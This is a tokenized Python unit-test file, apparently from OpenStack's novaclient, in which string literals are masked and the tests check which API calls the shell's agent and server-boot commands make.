] , l1 [ <NUM_LIT:0> ] , l1 [ <NUM_LIT:1> ] ) <EOL> self . _assertZone ( z0 [ <NUM_LIT:2> ] , l2 [ <NUM_LIT:0> ] , l2 [ <NUM_LIT:1> ] ) <EOL> self . _assertZone ( z1 [ <NUM_LIT:0> ] , l3 [ <NUM_LIT:0> ] , l3 [ <NUM_LIT:1> ] ) <EOL> self . _assertZone ( z1 [ <NUM_LIT:1> ] , l4 [ <NUM_LIT:0> ] , l4 [ <NUM_LIT:1> ] ) <EOL> self . _assertZone ( z1 [ <NUM_LIT:2> ] , l5 [ <NUM_LIT:0> ] , l5 [ <NUM_LIT:1> ] ) <EOL> self . _assertZone ( z1 [ <NUM_LIT:3> ] , l6 [ <NUM_LIT:0> ] , l6 [ <NUM_LIT:1> ] ) <EOL> self . _assertZone ( z1 [ <NUM_LIT:4> ] , l7 [ <NUM_LIT:0> ] , l7 [ <NUM_LIT:1> ] ) <EOL> self . _assertZone ( z2 [ <NUM_LIT:0> ] , l8 [ <NUM_LIT:0> ] , l8 [ <NUM_LIT:1> ] ) </s>
<s> import argparse <EOL> import base64 <EOL> import datetime <EOL> import os <EOL> import fixtures <EOL> import mock <EOL> from oslo_utils import timeutils <EOL> import six <EOL> from six . moves import builtins <EOL> import novaclient <EOL> from novaclient import api_versions <EOL> from novaclient import base <EOL> import novaclient . client <EOL> from novaclient import exceptions <EOL> import novaclient . shell <EOL> from novaclient . tests . unit import utils <EOL> from novaclient . tests . unit . v2 import fakes <EOL> import novaclient . v2 . shell <EOL> FAKE_UUID_1 = fakes . FAKE_IMAGE_UUID_1 <EOL> FAKE_UUID_2 = fakes . FAKE_IMAGE_UUID_2 <EOL> class ShellFixture ( fixtures . Fixture ) : <EOL> def setUp ( self ) : <EOL> super ( ShellFixture , self ) . setUp ( ) <EOL> self . shell = novaclient . shell . OpenStackComputeShell ( ) <EOL> def tearDown ( self ) : <EOL> if hasattr ( self . shell , '<STR_LIT>' ) : <EOL> self . shell . cs . clear_callstack ( ) <EOL> super ( ShellFixture , self ) . tearDown ( ) <EOL> class ShellTest ( utils . TestCase ) : <EOL> FAKE_ENV = { <EOL> '<STR_LIT>' : '<STR_LIT:username>' , <EOL> '<STR_LIT>' : '<STR_LIT:password>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:2>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> def setUp ( self ) : <EOL> """<STR_LIT>""" <EOL> super ( ShellTest , self ) . setUp ( ) <EOL> for var in self . FAKE_ENV : <EOL> self . useFixture ( fixtures . EnvironmentVariable ( var , <EOL> self . FAKE_ENV [ var ] ) ) <EOL> self . shell = self . useFixture ( ShellFixture ( ) ) . shell <EOL> self . useFixture ( fixtures . MonkeyPatch ( <EOL> '<STR_LIT>' , <EOL> lambda * args , ** kwargs : fakes . FakeClient ( * args , ** kwargs ) ) ) <EOL> @ mock . patch ( '<STR_LIT>' , new_callable = six . StringIO ) <EOL> @ mock . patch ( '<STR_LIT>' , new_callable = six . StringIO ) <EOL> def run_command ( self , cmd , mock_stderr , mock_stdout , api_version = None ) : <EOL> version_options = [ ] <EOL> if api_version : <EOL> version_options . extend ( [ "<STR_LIT>" , api_version , <EOL> "<STR_LIT>" , "<STR_LIT>" ] ) <EOL> if isinstance ( cmd , list ) : <EOL> self . shell . main ( version_options + cmd ) <EOL> else : <EOL> self . shell . main ( version_options + cmd . split ( ) ) <EOL> return mock_stdout . getvalue ( ) , mock_stderr . getvalue ( ) <EOL> def assert_called ( self , method , url , body = None , ** kwargs ) : <EOL> return self . shell . cs . assert_called ( method , url , body , ** kwargs ) <EOL> def assert_called_anytime ( self , method , url , body = None ) : <EOL> return self . shell . cs . assert_called_anytime ( method , url , body ) <EOL> def test_agents_list_with_hypervisor ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' ) <EOL> def test_agents_create ( self ) : <EOL> self . run_command ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> self . assert_called ( <EOL> '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:version>' : '<STR_LIT>' , <EOL> '<STR_LIT:url>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } } ) <EOL> def test_agents_delete ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> def test_agents_modify ( self ) : <EOL> self . run_command ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT>' , '<STR_LIT>' , <EOL> { "<STR_LIT>" : { <EOL> "<STR_LIT:url>" : "<STR_LIT>" , <EOL> "<STR_LIT:version>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" } } ) <EOL> def test_boot ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called_anytime ( <EOL> '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT:1>' , <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:1>' , <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> } } , <EOL> ) <EOL> def test_boot_image_with ( self ) : <EOL> self . run_command ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> self . assert_called_anytime ( <EOL> '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT:1>' , <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:1>' , <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> } } , <EOL> ) <EOL> def test_boot_key ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called_anytime ( <EOL> '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT:1>' , <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:1>' , <EOL> '<STR_LIT>' : '<STR_LIT:1>' , <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> } } , <EOL> ) <EOL> def test_boot_user_data ( self ) : <EOL> testfile = os . path . join ( os . path . dirname ( __file__ ) , '<STR_LIT>' ) <EOL> with open ( testfile ) as testfile_fd : <EOL> data = testfile_fd . read ( ) . encode ( '<STR_LIT:utf-8>' ) <EOL> expected_file_data = base64 . b64encode ( data ) . decode ( '<STR_LIT:utf-8>' ) <EOL> self . run_command ( <EOL> '<STR_LIT>' % testfile ) <EOL> self . assert_called_anytime ( <EOL> '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT:1>' , <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:1>' , <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : expected_file_data <EOL> } } , <EOL> ) <EOL> def test_boot_avzone ( self ) : <EOL> self . run_command ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> self . assert_called_anytime ( <EOL> '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT:1>' , <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:1>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : <NUM_LIT:1> <EOL> } } , <EOL> ) <EOL> def test_boot_secgroup ( self ) : <EOL> self . run_command ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> self . assert_called_anytime ( <EOL> '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : { <EOL> '<STR_LIT>' : [ { '<STR_LIT:name>' : '<STR_LIT>' } , <EOL> { '<STR_LIT:name>' : '<STR_LIT>' } ] , <EOL> '<STR_LIT>' : '<STR_LIT:1>' , <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:1>' , <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> } } , <EOL> ) <EOL> def test_boot_config_drive ( self ) : <EOL> self . run_command ( <EOL> '<STR_LIT>' ) <EOL> self . assert_called_anytime ( <EOL> '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT:1>' , <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:1>' , <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : True <EOL> } } , <EOL> ) <EOL> def test_boot_access_ip ( self ) : <EOL> self . run_command ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> self . assert_called_anytime ( <EOL> '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT:1>' , <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:1>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : <NUM_LIT:1> <EOL> } } , <EOL> ) <EOL> def test_boot_config_drive_custom ( self ) : <EOL> self . run_command ( <EOL> '<STR_LIT>' ) <EOL> self . assert_called_anytime ( <EOL> '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT:1>' , <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:1>' , <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } } , <EOL> ) <EOL> def test_boot_invalid_user_data ( self ) : <EOL> invalid_file = os . path . join ( os . path . dirname ( __file__ ) , <EOL> '<STR_LIT>' ) <EOL> cmd = ( '<STR_LIT>' <EOL> '<STR_LIT>' % invalid_file ) <EOL> self . assertRaises ( exceptions . CommandError , self . run_command , cmd ) <EOL> def test_boot_no_image_no_bdms ( self ) : <EOL> cmd = '<STR_LIT>' <EOL> self . assertRaises ( exceptions . CommandError , self . run_command , cmd ) <EOL> def test_boot_no_flavor ( self ) : <EOL> cmd = '<STR_LIT>' <EOL> self . assertRaises ( exceptions . CommandError , self . run_command , cmd ) <EOL> def test_boot_no_image_bdms ( self ) : <EOL> self . run_command ( <EOL> '<STR_LIT>' <EOL> ) <EOL> self . assert_called_anytime ( <EOL> '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT:1>' , <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : [ <EOL> { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:0>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } <EOL> ] , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> } } , <EOL> ) <EOL> def test_boot_image_bdms_v2 ( self ) : <EOL> self . run_command ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> ) <EOL> self . assert_called_anytime ( <EOL> '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT:1>' , <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : [ <EOL> { <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : '<STR_LIT:image>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : True , <EOL> } , <EOL> { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:1>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : False , <EOL> } , <EOL> ] , <EOL> '<STR_LIT>' : '<STR_LIT:1>' , <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> } } , <EOL> ) <EOL> def test_boot_no_image_bdms_v2 ( self ) : <EOL> self . run_command ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> ) <EOL> self . assert_called_anytime ( <EOL> '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT:1>' , <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : [ <EOL> { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:1>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:0>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : False , <EOL> } <EOL> ] , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> } } , <EOL> ) <EOL> cmd = '<STR_LIT>' <EOL> self . run_command ( cmd ) <EOL> self . assert_called_anytime ( <EOL> '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT:1>' , <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : [ <EOL> { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : False , <EOL> } <EOL> ] , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> } } , <EOL> ) <EOL> cmd = '<STR_LIT>' <EOL> self . run_command ( cmd ) <EOL> self . assert_called_anytime ( <EOL> '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT:1>' , <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : [ <EOL> { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : False , <EOL> } <EOL> ] , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> } } , <EOL> ) <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called_anytime ( <EOL> '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT:1>' , <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : [ <EOL> { <EOL> '<STR_LIT>' : '<STR_LIT:blank>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : - <NUM_LIT:1> , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:1>' , <EOL> '<STR_LIT>' : True , <EOL> } <EOL> ] , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> } } , <EOL> ) <EOL> self . run_command ( <EOL> '<STR_LIT>' <EOL> ) <EOL> self . assert_called_anytime ( <EOL> '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT:1>' , <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : [ <EOL> { <EOL> '<STR_LIT>' : '<STR_LIT:blank>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : - <NUM_LIT:1> , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:1>' , <EOL> '<STR_LIT>' : True , <EOL> } <EOL> ] , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> } } , <EOL> ) <EOL> def test_boot_bdms_v2_invalid_shutdown_value ( self ) : <EOL> self . assertRaises ( exceptions . CommandError , self . run_command , <EOL> ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) ) <EOL> def test_boot_metadata ( self ) : <EOL> self . run_command ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> self . assert_called_anytime ( <EOL> '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT:1>' , <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:1>' , <EOL> '<STR_LIT>' : { '<STR_LIT:foo>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> } } , <EOL> ) <EOL> def test_boot_hints ( self ) : <EOL> self . run_command ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> self . assert_called_anytime ( <EOL> '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT:1>' , <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:1>' , <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> } , <EOL> '<STR_LIT>' : { '<STR_LIT:a>' : [ '<STR_LIT>' , '<STR_LIT>' ] } , <EOL> } , <EOL> ) <EOL> def test_boot_nics ( self ) : <EOL> cmd = ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> self . run_command ( cmd ) <EOL> self . assert_called_anytime ( <EOL> '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT:1>' , <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:1>' , <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : [ <EOL> { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } , <EOL> ] , <EOL> } , <EOL> } , <EOL> ) <EOL> def test_boot_nics_ipv6 ( self ) : <EOL> cmd = ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> self . run_command ( cmd ) <EOL> self . assert_called_anytime ( <EOL> '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT:1>' , <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:1>' , <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : [ <EOL> { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } , <EOL> ] , <EOL> } , <EOL> } , <EOL> ) <EOL> def test_boot_nics_both_ipv4_and_ipv6 ( self ) : <EOL> cmd = ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> self . assertRaises ( exceptions . CommandError , self . run_command , cmd ) <EOL> def test_boot_nics_no_value ( self ) : <EOL> cmd = ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> self . assertRaises ( exceptions . CommandError , self . run_command , cmd ) <EOL> def test_boot_nics_random_key ( self ) : <EOL> cmd = ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> self . assertRaises ( exceptions . CommandError , self . run_command , cmd ) <EOL> def test_boot_nics_no_netid_or_portid ( self ) : <EOL> cmd = ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> self . assertRaises ( exceptions . CommandError , self . run_command , cmd ) <EOL> def test_boot_nics_netid_and_portid ( self ) : <EOL> cmd = ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> self . assertRaises ( exceptions . CommandError , self . run_command , cmd ) <EOL> def test_boot_nics_invalid_ipv4 ( self ) : <EOL> cmd = ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> self . assertRaises ( exceptions . CommandError , self . run_command , cmd ) <EOL> def test_boot_nics_invalid_ipv6 ( self ) : <EOL> cmd = ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> self . assertRaises ( exceptions . CommandError , self . run_command , cmd ) <EOL> def test_boot_nics_net_id_twice ( self ) : <EOL> cmd = ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> self . assertRaises ( exceptions . CommandError , self . run_command , cmd ) <EOL> @ mock . patch ( <EOL> '<STR_LIT>' ) <EOL> def test_boot_nics_net_name ( self , mock_networks_list ) : <EOL> mock_networks_list . return_value = ( <NUM_LIT:200> , { } , { <EOL> '<STR_LIT>' : [ { "<STR_LIT:label>" : "<STR_LIT>" , '<STR_LIT:id>' : '<STR_LIT:1>' } ] } ) <EOL> cmd = ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> self . run_command ( cmd ) <EOL> self . assert_called_anytime ( <EOL> '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT:1>' , <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:1>' , <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : [ <EOL> { '<STR_LIT>' : '<STR_LIT:1>' } , <EOL> ] , <EOL> } , <EOL> } , <EOL> ) <EOL> def test_boot_nics_net_name_not_found ( self ) : <EOL> cmd = ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> self . assertRaises ( exceptions . ResourceNotFound , self . run_command , cmd ) <EOL> @ mock . patch ( <EOL> '<STR_LIT>' ) <EOL> def test_boot_nics_net_name_multiple_matches ( self , mock_networks_list ) : <EOL> mock_networks_list . return_value = ( <NUM_LIT:200> , { } , { <EOL> '<STR_LIT>' : [ { "<STR_LIT:label>" : "<STR_LIT>" , '<STR_LIT:id>' : '<STR_LIT:1>' } , <EOL> { "<STR_LIT:label>" : "<STR_LIT>" , '<STR_LIT:id>' : '<STR_LIT:2>' } ] } ) <EOL> cmd = ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> self . assertRaises ( exceptions . NoUniqueMatch , self . run_command , cmd ) <EOL> @ mock . patch ( '<STR_LIT>' , return_value = '<STR_LIT>' ) <EOL> def test_boot_nics_net_name_and_net_id ( self , mock_find_network_id ) : <EOL> cmd = ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> self . assertRaises ( exceptions . CommandError , self . run_command , cmd ) <EOL> @ mock . patch ( '<STR_LIT>' , return_value = '<STR_LIT>' ) <EOL> def test_boot_nics_net_name_and_port_id ( self , mock_find_network_id ) : <EOL> cmd = ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> self . assertRaises ( exceptions . CommandError , self . run_command , cmd ) <EOL> def test_boot_files ( self ) : <EOL> testfile = os . path . join ( os . path . dirname ( __file__ ) , '<STR_LIT>' ) <EOL> with open ( testfile ) as testfile_fd : <EOL> data = testfile_fd . read ( ) <EOL> expected = base64 . b64encode ( data . encode ( '<STR_LIT:utf-8>' ) ) . decode ( '<STR_LIT:utf-8>' ) <EOL> cmd = ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> self . run_command ( cmd % ( testfile , testfile ) ) <EOL> self . assert_called_anytime ( <EOL> '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT:1>' , <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:1>' , <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : [ <EOL> { '<STR_LIT:path>' : '<STR_LIT>' , '<STR_LIT>' : expected } , <EOL> { '<STR_LIT:path>' : '<STR_LIT>' , '<STR_LIT>' : expected } , <EOL> ] <EOL> } } , <EOL> ) <EOL> def test_boot_invalid_files ( self ) : <EOL> invalid_file = os . path . join ( os . path . dirname ( __file__ ) , <EOL> '<STR_LIT>' ) <EOL> cmd = ( '<STR_LIT>' <EOL> '<STR_LIT>' % invalid_file ) <EOL> self . assertRaises ( exceptions . CommandError , self . run_command , cmd ) <EOL> def test_boot_num_instances ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called_anytime ( <EOL> '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT:1>' , <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:1>' , <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : <NUM_LIT:3> , <EOL> } <EOL> } ) <EOL> def test_boot_invalid_num_instances ( self ) : <EOL> cmd = '<STR_LIT>' <EOL> self . assertRaises ( exceptions . CommandError , self . run_command , cmd ) <EOL> def test_boot_num_instances_and_count ( self ) : <EOL> cmd = '<STR_LIT>' <EOL> self . assertRaises ( exceptions . CommandError , self . run_command , cmd ) <EOL> cmd = '<STR_LIT>' <EOL> self . assertRaises ( exceptions . CommandError , self . run_command , cmd ) <EOL> def test_boot_min_max_count ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called_anytime ( <EOL> '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT:1>' , <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:1>' , <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : <NUM_LIT:3> , <EOL> } <EOL> } ) <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called_anytime ( <EOL> '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT:1>' , <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:1>' , <EOL> '<STR_LIT>' : <NUM_LIT:3> , <EOL> '<STR_LIT>' : <NUM_LIT:3> , <EOL> } <EOL> } ) <EOL> self . run_command ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> self . assert_called_anytime ( <EOL> '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT:1>' , <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:1>' , <EOL> '<STR_LIT>' : <NUM_LIT:3> , <EOL> '<STR_LIT>' : <NUM_LIT:3> , <EOL> } <EOL> } ) <EOL> self . run_command ( '<STR_LIT>' <EOL> '<STR_LIT>' ) 